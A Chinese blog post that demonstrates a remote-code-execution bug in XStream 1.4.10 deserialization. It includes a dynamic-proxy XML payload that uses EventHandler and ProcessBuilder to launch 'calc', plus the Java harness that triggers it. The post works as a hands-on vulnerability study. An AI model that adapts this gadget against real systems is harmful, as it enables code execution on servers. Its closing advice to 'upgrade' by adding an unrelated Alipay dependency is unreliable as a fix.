• XStream反序列化漏洞测试实践

    XStream是一个将java对象序列化为xml以及从xml反序列化为java对象的开源类库。

    1.idea创建maven项目

    2.pom.xml中引入漏洞版本依赖

    <dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
    </dependencies>

      

    3.创建person类

    class Person
{
    private String name;
    private int age;
    public Person(String name,int age)
    {
        this.name=name;
        this.age=age;
    }
    @Override
    public String toString()
    {
        return "Person [name=" + name + ", age=" + age + "]";
    }

      

    4.创建main函数,测试一下

    import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;

public class Main {
    public static void main(String args[]) throws Exception{
        /*XML序列化*/
        Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//生成并设置XML解析器
        //序列化
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //反序列化
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);


    }
}

      

     可以看到的是,已经提示了XStream存在风险了。

    5.创建一个interface

    public interface Car {
    void start();
    void run();
    void stop();
}

      

    6.创建一个1.xml文件,放到resources目录下

    <dynamic-proxy>
    <interface>Car</interface>
    <handler class="java.beans.EventHandler">
        <target class="java.lang.ProcessBuilder">
            <command>
                <string>calc</string>
            </command>
        </target>
        <action>start</action>
    </handler>
</dynamic-proxy>

      

    6.创建一个类执行反序列化

    import com.thoughtworks.xstream.XStream;

import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.InputStream;

public class Rcetest {
    public void rcetest() throws FileNotFoundException {
        String path = this.getClass().getClassLoader().getResource("1.xml").getPath();
        InputStream in = new FileInputStream(path);
        XStream xs = new XStream();
        Car c = (Car)xs.fromXML(in);
        c.run();
    }
}

      

    7.main运行

    public class Main {
    public static void main(String args[]) throws Exception{
        /*XML序列化*/
        /*Person person=new Person("张四",19);
        XStream xstream = new XStream(new DomDriver());//生成并设置XML解析器
        //序列化
        String xml = xstream.toXML(person);
        System.out.println(xml);
        //反序列化
        person=(Person)xstream.fromXML(xml);
        System.out.println(person);*/
        Rcetest mytest =new Rcetest();
        mytest.rcetest();



    }
}

      

    之后再花时间分析原因吧

    建议升级版本:

    <dependency>
        <groupId>com.alipay.fc.supergw</groupId>
        <artifactId>fcsupergw-unimsg</artifactId>
        <version>2.0.0.20200805</version>
</dependency>

      
  • 相关阅读:
    hibernate中many-to-one的not-found属性和@notfound注解
    使用excel中的数据快速生成sql语句
    maven的生命周期
    单点登录(sso)入门
    sql server生成随机id
    javascript时间戳与日期格式的相互转换
    前后端分离的概念
    idea中maven项目打jar包
    [na][win]AD域组策略wifi自动配置
    [na]mail收发过程
  • 原文地址:https://www.cnblogs.com/fczlm/p/14440728.html
Copyright © 2020-2023  润新知